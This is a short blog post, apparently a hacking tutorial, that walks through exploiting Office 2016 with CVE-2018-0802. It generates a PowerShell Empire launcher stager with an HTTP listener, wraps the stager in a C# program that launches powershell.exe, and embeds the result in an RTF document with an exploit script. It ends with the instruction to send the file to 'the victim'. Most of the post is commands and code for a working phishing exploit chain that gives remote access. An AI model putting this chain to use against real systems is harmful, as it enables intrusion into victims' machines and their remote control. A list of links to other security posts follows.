Exploit Office 2016 using CVE-2018-0802

If you don't have Empire download from here 
Just run ./setup/install.sh to install

 Also Download Exploit for CVE-2018-0802 

 Create payload 

 usestager windows/launcher_bat 
set Listener http
execute

 cat /tmp/launcher.bat

 copy powershell script

 open visual studio

using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace shell
{
    class Program
    {
        static void Main(string[] args)
        {
            string strCmdText;
            strCmdText = "your-powershell-here";
            System.Diagnostics.Process.Start("powershell.exe", strCmdText);
        }
    }
}

 paste & Build save it shell.exe

Now go to CVE-2018-0802 folder 
run 

packager_exec_CVE-2018-0802.py -e shell.exe -o word.rtf

 send it to the victim 

Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Popular Posts

  • IDS, IPS AND FIREWALL EVASION USING NMAP
    NIDS – Network Intrusion Detection System   • It Uses a network tap, span port, or hub to collect packets on the network  • Attempts t...
  • Introduction To Linux
    In the early 80s Richard Stallman working in the AI lab in MIT started the GNU Project with the goal of creating an entire free and open...
  • TYPES OF FIREWALL
    What is a firewall? A firewall is a software program or piece of hardware that helps screen out hackers, viruses, and worms that tr...
  • VPN CONCENTRATORS
    A VPN concentrator is a type of networking device that provides secure creation of VPN connections and delivery of messages between VPN nod...
  • ZIRIKATU
  • PASSWORD GUESSING
    The most common type of attack is password guessing. Attackers can guess passwords locally or remotely using either a manual or automa...
  • Basic Linux Commands
    cd  cd ~               go to home dir cd ~username       go to user home dir cd -               go to last dir cd ./           ...